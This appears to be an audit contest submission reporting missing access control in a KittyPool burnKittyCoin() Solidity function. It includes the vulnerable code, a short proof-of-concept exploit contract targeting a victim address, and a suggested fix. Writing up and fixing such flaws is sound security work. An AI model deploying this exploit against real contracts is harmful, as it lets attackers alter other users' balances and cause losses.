Submission Details
Severity:
lacks of proper access control in burnKittyCoin()
Summary
The vulnerability allows any user to burn tokens from any other user's balance without authorization. This can lead to a significant loss of funds and disrupt the proper functioning of the token ecosystem.
Vulnerability Details
Function: burnKittyCoin
function burnKittyCoin(address _onBehalfOf, uint256 _ameownt) external {
kittyCoinMeownted[_onBehalfOf] -= _ameownt;
i_kittyCoin.burn(msg.sender, _ameownt);
}
Impact
Any user can burn tokens from any other user's balance without authorization.
PoC to demonstrate the exploit:
contract Exploit {
KittyPool kittyPool;
constructor(address _kittyPool) {
kittyPool = KittyPool(_kittyPool);
}
function executeExploit(address victim, uint256 amount) external {
kittyPool.burnKittyCoin(victim, amount);
}
}
Tools Used
manual review and foundry
Recommendations
function should be modified to ensure that users can only burn their own tokens.
function burnKittyCoin(uint256 _ameownt) external {
require(kittyCoinMeownted[msg.sender] >= _ameownt, "Insufficient balance to burn");
kittyCoinMeownted[msg.sender] -= _ameownt;
i_kittyCoin.burn(msg.sender, _ameownt);
}
Rewards breakdown
nSLOC
224This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.